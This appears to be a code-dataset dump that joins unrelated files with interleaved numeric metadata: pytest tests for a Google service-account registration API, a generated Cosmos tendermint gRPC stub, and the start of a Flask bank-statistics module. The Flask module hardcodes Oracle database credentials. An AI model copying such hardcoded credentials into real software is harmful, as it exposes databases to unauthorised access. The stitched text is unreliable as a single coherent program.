db_session.query(ServiceAccountToGoogleBucketAccessGroup).filter_by(
service_account_id=service_account.id
)
).all()
# ensure all access was removed
assert len(service_account_accesses) == 0
def test_invalid_service_account_dry_run_errors(
cloud_manager,
client,
app,
encoded_jwt_service_accounts_access,
valid_service_account_patcher,
db_session,
):
"""
Test that an invalid service account gives us the expected error structure
"""
valid_service_account_patcher[
"service_account_has_external_access"
].return_value = True
encoded_creds_jwt = encoded_jwt_service_accounts_access["jwt"]
db_session.add(Project(auth_id="project_a"))
db_session.add(Project(auth_id="project_b"))
db_session.commit()
project_access = ["project_a", "project_b"]
invalid_service_account = {
"service_account_email": "test123@test.com",
"google_project_id": "some-google-project-872340ajsdkj",
"project_access": project_access,
}
response = client.post(
"/google/service_accounts/_dry_run",
headers={"Authorization": "Bearer " + encoded_creds_jwt},
data=json.dumps(invalid_service_account),
content_type="application/json",
)
assert response.status_code != 200
_assert_expected_error_response_structure(response, project_access)
def test_invalid_service_account_has_external_access(
client,
app,
encoded_jwt_service_accounts_access,
valid_service_account_patcher,
valid_google_project_patcher,
db_session,
cloud_manager,
):
"""
Test that an invalid service account gives us the expected error structure
"""
sa_patcher = valid_service_account_patcher
proj_patcher = valid_google_project_patcher
sa_patcher["service_account_has_external_access"].return_value = True
proj_patcher["get_service_account_ids_from_google_members"].return_value = [
"test123@test.com"
]
encoded_creds_jwt = encoded_jwt_service_accounts_access["jwt"]
(
cloud_manager.return_value.__enter__.return_value.get_service_account.return_value
) = {"uniqueId": "0", "email": "test123@test.com"}
db_session.add(Project(auth_id="project_a"))
db_session.add(Project(auth_id="project_b"))
db_session.commit()
project_access = ["project_a", "project_b"]
invalid_service_account = {
"service_account_email": "test123@test.com",
"google_project_id": "some-google-project-872340ajsdkj",
"project_access": project_access,
}
response = client.post(
"/google/service_accounts",
headers={"Authorization": "Bearer " + encoded_creds_jwt},
data=json.dumps(invalid_service_account),
content_type="application/json",
)
assert response.status_code == 400
_assert_expected_error_response_structure(response, project_access)
assert response.json["errors"]["service_account_email"]["status"] == 403
def test_invalid_service_account_has_invalid_type(
client,
app,
encoded_jwt_service_accounts_access,
valid_service_account_patcher,
valid_google_project_patcher,
db_session,
cloud_manager,
):
"""
Test that an invalid service account gives us the expected error structure
"""
valid_service_account_patcher["is_valid_service_account_type"].return_value = False
encoded_creds_jwt = encoded_jwt_service_accounts_access["jwt"]
db_session.add(Project(auth_id="project_a"))
db_session.add(Project(auth_id="project_b"))
db_session.commit()
project_access = ["project_a", "project_b"]
(
cloud_manager.return_value.__enter__.return_value.get_service_account.return_value
) = {"uniqueId": "0", "email": "test123@test.com"}
invalid_service_account = {
"service_account_email": "test123@test.com",
"google_project_id": "some-google-project-872340ajsdkj",
"project_access": project_access,
}
response = client.post(
"/google/service_accounts",
headers={"Authorization": "Bearer " + encoded_creds_jwt},
data=json.dumps(invalid_service_account),
content_type="application/json",
)
assert response.status_code == 400
_assert_expected_error_response_structure(response, project_access)
assert response.json["errors"]["service_account_email"]["status"] == 403
def test_invalid_service_account_not_owned_by_project(
client,
app,
encoded_jwt_service_accounts_access,
valid_service_account_patcher,
valid_google_project_patcher,
db_session,
cloud_manager,
):
"""
Test that an invalid service account gives us the expected error structure
"""
(
valid_service_account_patcher[
"is_service_account_from_google_project"
].return_value
) = False
encoded_creds_jwt = encoded_jwt_service_accounts_access["jwt"]
db_session.add(Project(auth_id="project_a"))
db_session.add(Project(auth_id="project_b"))
db_session.commit()
project_access = ["project_a", "project_b"]
(
cloud_manager.return_value.__enter__.return_value.get_service_account.return_value
) = {"uniqueId": "0", "email": "test123@test.com"}
invalid_service_account = {
"service_account_email": "test123@test.com",
"google_project_id": "some-google-project-872340ajsdkj",
"project_access": project_access,
}
response = client.post(
"/google/service_accounts",
headers={"Authorization": "Bearer " + encoded_creds_jwt},
data=json.dumps(invalid_service_account),
content_type="application/json",
)
assert response.status_code == 400
_assert_expected_error_response_structure(response, project_access)
assert response.json["errors"]["service_account_email"]["status"] == 403
def test_invalid_get_google_project_parent_org(
client,
app,
encoded_jwt_service_accounts_access,
valid_service_account_patcher,
valid_google_project_patcher,
db_session,
cloud_manager,
):
"""
Test that an invalid service account gives us the expected error structure
"""
(
valid_google_project_patcher["get_google_project_parent_org"].return_value
) = "some-parent-org"
encoded_creds_jwt = encoded_jwt_service_accounts_access["jwt"]
db_session.add(Project(auth_id="project_a"))
db_session.add(Project(auth_id="project_b"))
db_session.commit()
project_access = ["project_a", "project_b"]
(
cloud_manager.return_value.__enter__.return_value.get_service_account.return_value
) = {"uniqueId": "0", "email": "test123@test.com"}
invalid_service_account = {
"service_account_email": "test123@test.com",
"google_project_id": "some-google-project-872340ajsdkj",
"project_access": project_access,
}
response = client.post(
"/google/service_accounts",
headers={"Authorization": "Bearer " + encoded_creds_jwt},
data=json.dumps(invalid_service_account),
content_type="application/json",
)
assert response.status_code == 400
_assert_expected_error_response_structure(response, project_access)
assert response.json["errors"]["google_project_id"]["status"] == 403
def test_valid_get_google_project_parent_org(
cloud_manager,
client,
app,
encoded_jwt_service_accounts_access,
valid_service_account_patcher,
valid_google_project_patcher,
db_session,
monkeypatch,
):
"""
Test that a valid service account gives us the expected response when it has
a parent org BUT that org is whitelisted.
"""
monkeypatch.setitem(
config, "WHITE_LISTED_GOOGLE_PARENT_ORGS", ["whitelisted-parent-org"]
)
(
valid_google_project_patcher["get_google_project_parent_org"].return_value
) = "whitelisted-parent-org"
encoded_creds_jwt = encoded_jwt_service_accounts_access["jwt"]
db_session.add(Project(auth_id="project_a"))
db_session.add(Project(auth_id="project_b"))
db_session.commit()
project_access = ["project_a", "project_b"]
(
cloud_manager.return_value.__enter__.return_value.get_service_account.return_value
) = {"uniqueId": "0", "email": "test123@test.com"}
valid_service_account = {
"service_account_email": "test123@test.com",
"google_project_id": "some-google-project-872340ajsdkj",
"project_access": project_access,
}
response = client.post(
"/google/service_accounts",
headers={"Authorization": "Bearer " + encoded_creds_jwt},
data=json.dumps(valid_service_account),
content_type="application/json",
)
assert response.status_code == 200
def test_invalid_google_project_has_invalid_membership(
client,
app,
encoded_jwt_service_accounts_access,
valid_service_account_patcher,
valid_google_project_patcher,
db_session,
cloud_manager,
):
"""
Test that an invalid service account gives us the expected error structure
"""
valid_google_project_patcher[
"get_google_project_valid_users_and_service_accounts"
].side_effect = Exception()
encoded_creds_jwt = encoded_jwt_service_accounts_access["jwt"]
db_session.add(Project(auth_id="project_a"))
db_session.add(Project(auth_id="project_b"))
db_session.commit()
project_access = ["project_a", "project_b"]
(
cloud_manager.return_value.__enter__.return_value.get_service_account.return_value
) = {"uniqueId": "0", "email": "test123@test.com"}
invalid_service_account = {
"service_account_email": "test123@test.com",
"google_project_id": "some-google-project-872340ajsdkj",
"project_access": project_access,
}
response = client.post(
"/google/service_accounts",
headers={"Authorization": "Bearer " + encoded_creds_jwt},
data=json.dumps(invalid_service_account),
content_type="application/json",
)
assert response.status_code == 400
_assert_expected_error_response_structure(response, project_access)
assert response.json["errors"]["google_project_id"]["status"] == 403
def test_invalid_google_project_no_access(
client,
app,
encoded_jwt_service_accounts_access,
valid_service_account_patcher,
valid_google_project_patcher,
db_session,
):
"""
Test that an invalid service account gives us the expected error structure
"""
(
valid_google_project_patcher["do_all_users_have_access_to_project"].return_value
) = False
(
valid_google_project_patcher[
"get_project_access_from_service_accounts"
].return_value
) = []
encoded_creds_jwt = encoded_jwt_service_accounts_access["jwt"]
project_access = ["project_a", "project_b"]
invalid_service_account = {
"service_account_email": "test123@test.com",
"google_project_id": "some-google-project-872340ajsdkj",
"project_access": project_access,
}
response = client.post(
"/google/service_accounts",
headers={"Authorization": "Bearer " + encoded_creds_jwt},
data=json.dumps(invalid_service_account),
content_type="application/json",
)
assert response.status_code == 400
_assert_expected_error_response_structure(response, project_access)
assert response.json["errors"]["project_access"]["status"] != 200
def test_service_account_registration_expires_in(
app,
db_session,
client,
encoded_jwt_service_accounts_access,
cloud_manager,
valid_google_project_patcher,
valid_service_account_patcher,
):
"""
Test that a service account registration with a valid expires_in is
successful, and that a registration with an invalid expires_in is not.
"""
project = Project(id=1, auth_id="some_auth_id")
bucket = Bucket(id=1)
db_session.add(project)
db_session.add(bucket)
db_session.commit()
project_to_bucket = ProjectToBucket(project_id=1, bucket_id=1)
db_session.add(project_to_bucket)
db_session.commit()
gbag = GoogleBucketAccessGroup(id=1, bucket_id=1, email="gbag@gmail.com")
db_session.add(gbag)
db_session.commit()
encoded_creds_jwt = encoded_jwt_service_accounts_access["jwt"]
project_access = ["some_auth_id"]
valid_service_account = {
"service_account_email": "sa@gmail.com",
"google_project_id": "project-id",
"project_access": project_access,
}
(
cloud_manager.return_value.__enter__.return_value.get_service_account.return_value
) = {"uniqueId": "sa_unique_id", "email": "sa@gmail.com"}
(
cloud_manager.return_value.__enter__.return_value.add_member_to_group.return_value
) = {"email": "sa@gmail.com"}
assert len(db_session.query(UserServiceAccount).all()) == 0
assert len(db_session.query(ServiceAccountAccessPrivilege).all()) == 0
assert len(db_session.query(ServiceAccountToGoogleBucketAccessGroup).all()) == 0
# valid expires_in: should succeed
requested_exp = 60
response = client.post(
"/google/service_accounts?expires_in={}".format(requested_exp),
headers={"Authorization": "Bearer " + encoded_creds_jwt},
data=json.dumps(valid_service_account),
content_type="application/json",
)
assert response.status_code == 200 # check if success
assert len(db_session.query(UserServiceAccount).all()) == 1
assert len(db_session.query(ServiceAccountAccessPrivilege).all()) == 1
sa_to_bucket_entries = db_session.query(
ServiceAccountToGoogleBucketAccessGroup
).all()
assert len(sa_to_bucket_entries) == 1
# make sure the access was granted for the requested time
# (allow up to 10 sec for runtime)
diff = sa_to_bucket_entries[0].expires - int(time.time())
assert requested_exp <= diff <= requested_exp + 10
# invalid expires_in: should fail
requested_exp = "abc" # expires_in must be int >0
response = client.post(
"/google/service_accounts?expires_in={}".format(requested_exp),
headers={"Authorization": "Bearer " + encoded_creds_jwt},
data=json.dumps(valid_service_account),
content_type="application/json",
)
assert response.status_code == 400 # check if failure
def test_valid_service_account_registration(
app,
db_session,
client,
encoded_jwt_service_accounts_access,
cloud_manager,
valid_google_project_patcher,
valid_service_account_patcher,
):
"""
Test that a valid service account registration request returns
200 and successfully creates entries in the database
"""
project = Project(id=1, auth_id="some_auth_id")
bucket = Bucket(id=1)
db_session.add(project)
db_session.add(bucket)
db_session.commit()
project_to_bucket = ProjectToBucket(project_id=1, bucket_id=1)
db_session.add(project_to_bucket)
db_session.commit()
gbag = GoogleBucketAccessGroup(id=1, bucket_id=1, email="gbag@gmail.com")
db_session.add(gbag)
db_session.commit()
encoded_creds_jwt = encoded_jwt_service_accounts_access["jwt"]
project_access = ["some_auth_id"]
valid_service_account = {
"service_account_email": "sa@gmail.com",
"google_project_id": "project-id",
"project_access": project_access,
}
(
cloud_manager.return_value.__enter__.return_value.get_service_account.return_value
) = {"uniqueId": "sa_unique_id", "email": "sa@gmail.com"}
(
cloud_manager.return_value.__enter__.return_value.add_member_to_group.return_value
) = {"email": "sa@gmail.com"}
assert len(db_session.query(UserServiceAccount).all()) == 0
assert len(db_session.query(ServiceAccountAccessPrivilege).all()) == 0
assert len(db_session.query(ServiceAccountToGoogleBucketAccessGroup).all()) == 0
response = client.post(
"/google/service_accounts",
headers={"Authorization": "Bearer " + encoded_creds_jwt},
data=json.dumps(valid_service_account),
content_type="application/json",
)
assert response.status_code == 200
assert len(db_session.query(UserServiceAccount).all()) == 1
assert len(db_session.query(ServiceAccountAccessPrivilege).all()) == 1
assert len(db_session.query(ServiceAccountToGoogleBucketAccessGroup).all()) == 1
def test_valid_service_account_registration_multiple_service_accounts(
app,
db_session,
client,
encoded_jwt_service_accounts_access,
cloud_manager,
valid_google_project_patcher,
valid_service_account_patcher,
):
"""
Test that a valid service account registration request returns
200 and successfully creates entries in the database when the Google project
has both another valid service account in the project and a Google-managed
system service account.
"""
proj_patcher = valid_google_project_patcher
project = Project(id=1, auth_id="some_auth_id")
bucket = Bucket(id=1)
db_session.add(project)
db_session.add(bucket)
db_session.commit()
project_to_bucket = ProjectToBucket(project_id=1, bucket_id=1)
db_session.add(project_to_bucket)
db_session.commit()
gbag = GoogleBucketAccessGroup(id=1, bucket_id=1, email="gbag@gmail.com")
db_session.add(gbag)
db_session.commit()
google_project_id = "project-id"
encoded_creds_jwt = encoded_jwt_service_accounts_access["jwt"]
project_access = ["some_auth_id"]
proj_patcher["get_service_account_ids_from_google_members"].return_value = [
"test-{}@test.com".format(google_project_id),
"{}@compute-system.iam.gserviceaccount.com".format(google_project_id),
]
valid_service_account = {
"service_account_email": "sa@gmail.com",
"google_project_id": google_project_id,
"project_access": project_access,
}
(
cloud_manager.return_value.__enter__.return_value.get_service_account.return_value
) = {"uniqueId": "sa_unique_id", "email": "sa@gmail.com"}
(
cloud_manager.return_value.__enter__.return_value.add_member_to_group.return_value
) = {"email": "sa@gmail.com"}
assert len(db_session.query(UserServiceAccount).all()) == 0
assert len(db_session.query(ServiceAccountAccessPrivilege).all()) == 0
assert len(db_session.query(ServiceAccountToGoogleBucketAccessGroup).all()) == 0
response = client.post(
"/google/service_accounts",
headers={"Authorization": "Bearer " + encoded_creds_jwt},
data=json.dumps(valid_service_account),
content_type="application/json",
)
assert response.status_code == 200
assert len(db_session.query(UserServiceAccount).all()) == 1
assert len(db_session.query(ServiceAccountAccessPrivilege).all()) == 1
assert len(db_session.query(ServiceAccountToGoogleBucketAccessGroup).all()) == 1
def test_register_service_account_already_exists(
app,
db_session,
client,
encoded_jwt_service_accounts_access,
cloud_manager,
valid_google_project_patcher,
valid_service_account_patcher,
):
project = Project(id=1, auth_id="some_auth_id")
bucket = Bucket(id=1)
db_session.add(project)
db_session.add(bucket)
db_session.commit()
project_to_bucket = ProjectToBucket(project_id=1, bucket_id=1)
db_session.add(project_to_bucket)
db_session.commit()
gbag = GoogleBucketAccessGroup(id=1, bucket_id=1, email="gbag@gmail.com")
db_session.add(gbag)
db_session.commit()
encoded_creds_jwt = encoded_jwt_service_accounts_access["jwt"]
project_access = ["some_auth_id"]
valid_service_account = {
"service_account_email": "sa@gmail.com",
"google_project_id": "project-id",
"project_access": project_access,
}
(
cloud_manager.return_value.__enter__.return_value.get_service_account.return_value
) = {"uniqueId": "sa_unique_id", "email": "sa@gmail.com"}
(
cloud_manager.return_value.__enter__.return_value.add_member_to_group.return_value
) = {"email": "sa@gmail.com"}
response = client.post(
"/google/service_accounts",
headers={"Authorization": "Bearer " + encoded_creds_jwt},
data=json.dumps(valid_service_account),
content_type="application/json",
)
assert response.status_code == 200
response = client.post(
"/google/service_accounts",
headers={"Authorization": "Bearer " + encoded_creds_jwt},
data=json.dumps(valid_service_account),
content_type="application/json",
)
assert response.status_code == 400
assert response.json["errors"]["service_account_email"]["status"] == 409
assert len(db_session.query(UserServiceAccount).all()) == 1
assert len(db_session.query(ServiceAccountAccessPrivilege).all()) == 1
assert len(db_session.query(ServiceAccountToGoogleBucketAccessGroup).all()) == 1
def _assert_expected_service_account_response_structure(data):
assert "service_account_email" in data
assert "google_project_id" in data
assert "project_access" in data
assert hasattr(data["project_access"], "__iter__")
def _assert_expected_error_response_structure(response, project_access):
assert "success" in response.json
assert "errors" in response.json
assert "service_account_email" in response.json["errors"]
_assert_expected_error_info_structure(
response.json["errors"]["service_account_email"]
)
assert "google_project_id" in response.json["errors"]
_assert_expected_error_info_structure(response.json["errors"]["google_project_id"])
assert "project_access" in response.json["errors"]
_assert_expected_error_info_structure(response.json["errors"]["project_access"])
def _assert_expected_error_info_structure(data):
assert EXPECTED_ERROR_RESPONSE_KEYS.issubset(list(data.keys()))
| 32.963913
| 90
| 0.70047
| 4,051
| 34,711
| 5.611701
| 0.067884
| 0.122553
| 0.028373
| 0.043989
| 0.885277
| 0.853517
| 0.829323
| 0.813047
| 0.797563
| 0.781727
| 0
| 0.009023
| 0.20178
| 34,711
| 1,052
| 91
| 32.995247
| 0.811456
| 0.13768
| 0
| 0.760929
| 0
| 0
| 0.169977
| 0.069527
| 0
| 0
| 0
| 0
| 0.122951
| 1
| 0.031421
| false
| 0
| 0.012295
| 0
| 0.043716
| 0.001366
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9c640b07c99a6dd642a4d4e997e555fffcde3b36
| 12,460
|
py
|
Python
|
cosmpy/protos/cosmos/base/tendermint/v1beta1/query_pb2_grpc.py
|
evsmithx/cosmpy
|
7dfc81528b287f90190d6d4387942340f8ab88cf
|
[
"Apache-2.0"
] | 15
|
2021-09-08T05:27:14.000Z
|
2022-03-29T06:48:08.000Z
|
cosmpy/protos/cosmos/base/tendermint/v1beta1/query_pb2_grpc.py
|
evsmithx/cosmpy
|
7dfc81528b287f90190d6d4387942340f8ab88cf
|
[
"Apache-2.0"
] | 39
|
2021-08-19T20:09:35.000Z
|
2022-03-22T19:51:59.000Z
|
cosmpy/protos/cosmos/base/tendermint/v1beta1/query_pb2_grpc.py
|
evsmithx/cosmpy
|
7dfc81528b287f90190d6d4387942340f8ab88cf
|
[
"Apache-2.0"
] | 5
|
2021-11-02T16:23:48.000Z
|
2022-01-20T22:30:05.000Z
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from cosmos.base.tendermint.v1beta1 import query_pb2 as cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2
class ServiceStub(object):
"""Service defines the gRPC querier service for tendermint queries.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetNodeInfo = channel.unary_unary(
'/cosmos.base.tendermint.v1beta1.Service/GetNodeInfo',
request_serializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetNodeInfoRequest.SerializeToString,
response_deserializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetNodeInfoResponse.FromString,
)
self.GetSyncing = channel.unary_unary(
'/cosmos.base.tendermint.v1beta1.Service/GetSyncing',
request_serializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetSyncingRequest.SerializeToString,
response_deserializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetSyncingResponse.FromString,
)
self.GetLatestBlock = channel.unary_unary(
'/cosmos.base.tendermint.v1beta1.Service/GetLatestBlock',
request_serializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetLatestBlockRequest.SerializeToString,
response_deserializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetLatestBlockResponse.FromString,
)
self.GetBlockByHeight = channel.unary_unary(
'/cosmos.base.tendermint.v1beta1.Service/GetBlockByHeight',
request_serializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetBlockByHeightRequest.SerializeToString,
response_deserializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetBlockByHeightResponse.FromString,
)
self.GetLatestValidatorSet = channel.unary_unary(
'/cosmos.base.tendermint.v1beta1.Service/GetLatestValidatorSet',
request_serializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetLatestValidatorSetRequest.SerializeToString,
response_deserializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetLatestValidatorSetResponse.FromString,
)
self.GetValidatorSetByHeight = channel.unary_unary(
'/cosmos.base.tendermint.v1beta1.Service/GetValidatorSetByHeight',
request_serializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetValidatorSetByHeightRequest.SerializeToString,
response_deserializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetValidatorSetByHeightResponse.FromString,
)
class ServiceServicer(object):
"""Service defines the gRPC querier service for tendermint queries.
"""
def GetNodeInfo(self, request, context):
"""GetNodeInfo queries the current node info.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetSyncing(self, request, context):
"""GetSyncing queries node syncing.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetLatestBlock(self, request, context):
"""GetLatestBlock returns the latest block.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetBlockByHeight(self, request, context):
"""GetBlockByHeight queries block for given height.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetLatestValidatorSet(self, request, context):
"""GetLatestValidatorSet queries latest validator-set.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetValidatorSetByHeight(self, request, context):
"""GetValidatorSetByHeight queries validator-set at a given height.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_ServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetNodeInfo': grpc.unary_unary_rpc_method_handler(
servicer.GetNodeInfo,
request_deserializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetNodeInfoRequest.FromString,
response_serializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetNodeInfoResponse.SerializeToString,
),
'GetSyncing': grpc.unary_unary_rpc_method_handler(
servicer.GetSyncing,
request_deserializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetSyncingRequest.FromString,
response_serializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetSyncingResponse.SerializeToString,
),
'GetLatestBlock': grpc.unary_unary_rpc_method_handler(
servicer.GetLatestBlock,
request_deserializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetLatestBlockRequest.FromString,
response_serializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetLatestBlockResponse.SerializeToString,
),
'GetBlockByHeight': grpc.unary_unary_rpc_method_handler(
servicer.GetBlockByHeight,
request_deserializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetBlockByHeightRequest.FromString,
response_serializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetBlockByHeightResponse.SerializeToString,
),
'GetLatestValidatorSet': grpc.unary_unary_rpc_method_handler(
servicer.GetLatestValidatorSet,
request_deserializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetLatestValidatorSetRequest.FromString,
response_serializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetLatestValidatorSetResponse.SerializeToString,
),
'GetValidatorSetByHeight': grpc.unary_unary_rpc_method_handler(
servicer.GetValidatorSetByHeight,
request_deserializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetValidatorSetByHeightRequest.FromString,
response_serializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetValidatorSetByHeightResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'cosmos.base.tendermint.v1beta1.Service', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class Service(object):
"""Service defines the gRPC querier service for tendermint queries.
"""
@staticmethod
def GetNodeInfo(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/cosmos.base.tendermint.v1beta1.Service/GetNodeInfo',
cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetNodeInfoRequest.SerializeToString,
cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetNodeInfoResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetSyncing(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/cosmos.base.tendermint.v1beta1.Service/GetSyncing',
cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetSyncingRequest.SerializeToString,
cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetSyncingResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetLatestBlock(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/cosmos.base.tendermint.v1beta1.Service/GetLatestBlock',
cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetLatestBlockRequest.SerializeToString,
cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetLatestBlockResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetBlockByHeight(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/cosmos.base.tendermint.v1beta1.Service/GetBlockByHeight',
cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetBlockByHeightRequest.SerializeToString,
cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetBlockByHeightResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetLatestValidatorSet(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/cosmos.base.tendermint.v1beta1.Service/GetLatestValidatorSet',
cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetLatestValidatorSetRequest.SerializeToString,
cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetLatestValidatorSetResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetValidatorSetByHeight(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/cosmos.base.tendermint.v1beta1.Service/GetValidatorSetByHeight',
cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetValidatorSetByHeightRequest.SerializeToString,
cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetValidatorSetByHeightResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
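# --- Editor's usage sketch (not part of the generated stub) ---
# Minimal client-side call through the experimental API above. The endpoint
# 'localhost:9090' is a hypothetical Cosmos SDK node gRPC address.
if __name__ == '__main__':
    request = cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetNodeInfoRequest()
    response = Service.GetNodeInfo(request, 'localhost:9090', insecure=True)
    print(response)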
9c6e0fa0c7dc2d5f178e7149da0108da67416876 | 129,351 | py | Python | bankManage/backEndService/summary.py | ShangziXue/A-simple-bank-system | 8d08ae8cfd159286a329da7c35ebc4ca77b2fe6d | [ "MIT" ] | null | null | null |
from flask import Flask
from flask import request
from flask import jsonify
from flask import make_response
from flask_cors import *
import json
import time
import cx_Oracle
import os,sys
import math
from matplotlib import font_manager as fm
import matplotlib as mpl
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
from flask import Blueprint
summary_api = Blueprint('summary_api', __name__)
# Row factory helper: makes an Oracle cursor return rows as dicts keyed by lower-cased column names
def makeDictFactory(cursor):
columnNames = [d[0].lower() for d in cursor.description]
def createRow(*args):
return dict(zip(columnNames, args))
return createRow
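# Editor's note: typical use is
#     cursor.execute(sql)
#     cursor.rowfactory = makeDictFactory(cursor)
#     rows = cursor.fetchall()   # each row is now a dict keyed by lower-cased column name
# which is exactly the pattern followed throughout this module.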
#-------------------------------
# Return the index in blist of year a (e.g. 2018), or -1 if absent
def locate(a,blist):
for i in range(len(blist)):
if blist[i]['time'] == str(a):
return i
return -1
#------------------------------
# Return the index in clist of year a, month b (e.g. 2018 12), or -1 if absent
def locate_month(a,b,clist):
combine_ab = str(a) + '.' + str(b)
for i in range(len(clist)):
if clist[i]['time'] == combine_ab:
return i
return -1
#------------------------------
# Return the index in clist of the quarter containing year a, month b (e.g. 2018 12), or -1 if absent
def locate_season(a,b,clist):
s = math.ceil(b/3)
season = str(a) + '-' + str(s)
for i in range(len(clist)):
if clist[i]['time'] == season:
return i
return -1
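# Editor's self-check sketch for the three lookup helpers (sample data is made up);
# runs only when this module is executed directly.
if __name__ == '__main__':
    assert locate(2019, [{'time': '2018'}, {'time': '2019'}]) == 1
    assert locate(2020, [{'time': '2018'}]) == -1
    assert locate_month(2018, 12, [{'time': '2018.12'}]) == 0
    assert locate_season(2018, 12, [{'time': '2018-4'}]) == 0  # December is quarter 4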
#==============================================================================================
# Back-end handler for business statistics
@summary_api.route('/summary',methods=['POST'])
def summary():
# TODO: run the database queries requested by the front end and return the statistics; a chart can also be rendered to static/summary.png for the front end to fetch
connection = cx_Oracle.connect('System/db2019@localhost/ORCL')
cursor = connection.cursor()
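# Editor's note: the DSN and credentials above are hardcoded, and neither the
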